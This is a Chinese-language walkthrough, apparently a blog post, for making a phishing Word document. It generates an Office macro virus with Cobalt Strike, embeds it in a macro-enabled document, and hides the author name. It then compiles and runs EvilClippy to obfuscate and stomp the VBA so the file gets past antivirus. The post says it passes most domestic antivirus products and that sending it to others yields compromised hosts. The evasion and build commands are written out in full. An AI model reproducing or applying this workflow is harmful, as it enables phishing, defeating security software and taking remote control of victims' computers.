1.開啟Cobalt-Strike生產Office巨集病毒。
首先需要設定監聽器、因為釣魚的目標比較單純,在這裡就不採用域前置技術。
然後使用攻擊模組,生產Office巨集病毒。
設定好監聽器。
生成巨集病毒
2.將巨集病毒放入word
首先開啟Word,在審閱中編輯巨集:
建立新的巨集:
將生成的巨集病毒放入Microsoft Word目錄下的ThisDocument,注意如果巨集位置寫錯了很容易報錯。
按下Ctrl+S,將檔案儲存為啟用巨集的Word文件,注意這裡的作者需要修改,否則預設會使用賬戶名
此時帶巨集病毒的Word檔案已經生成,但是會發現過不了殺軟,需要進行免殺。
此時需要一款比較知名的免殺軟體:EvilClippy
軟體需要編譯執行,由於本人使用的是Linux環境進行免殺,所以命令如下:
首先需要有mono環境:
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
echo "deb http://download.mono-project.com/repo/debian wheezy main" | sudo tee /etc/apt/sources.list.d/mono-xamarin.list
sudo apt-get update
sudo apt-get install mono-completesudo
apt-get install monodevelop
然後使用mono,進行編譯:
mcs /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs
檢查免殺軟體是否可以正常執行:
mono EvilClippy.exe -h
然後進行免殺操作:
首先需要建立一個vba檔案,後續需要進行混淆,vba內容如下
Sub Hello()
Dim X
X=MsgBox("Hello VBS")
#先使用一個模組來設定隨機模組名,混淆了一些分析工具,會生成一個以_EvilClippy.docm結尾的檔案。
mono EvilClippy.exe -r Doc1.docm
#其次使用之前設定的vba檔案對生成檔案進行偽裝混淆,命令如下
mono EvilClippy.exe -s 3.vba Doc1_EvilClippy.docm
生成檔案,放入沙箱進行查殺,效果如下:
過了國內大部分殺軟。
因此將檔案發給別人就可以觀察到Cobalt-Strike有上線 主機了。
